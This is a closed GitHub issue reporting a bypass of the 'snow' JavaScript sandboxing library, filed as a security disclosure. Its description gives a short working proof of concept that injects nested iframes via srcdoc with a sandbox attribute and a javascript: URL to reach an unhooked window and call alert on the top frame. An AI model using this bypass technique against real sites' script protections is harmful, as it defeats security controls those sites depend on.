-
Notifications
You must be signed in to change notification settings - Fork 7
Bypass using iframe sandbox #92
Copy link
Copy link
Closed
Labels
vulnerabilityIntroduces snow bypassIntroduces snow bypass
Description
var d = document.createElement('div');
document.body.appendChild(d);
d.innerHTML = `<iframe
srcdoc="<iframe sandbox='allow-same-origin' src='javascript:alert(1)'></iframe><script>frames[0].alert.call(top, 1);</script>"
</iframe>`;Same idea as #90, just using sandbox to break the internal SNOW_WINDOW call :)
Reactions are currently unavailable
Metadata
Metadata
Assignees
Labels
vulnerabilityIntroduces snow bypassIntroduces snow bypass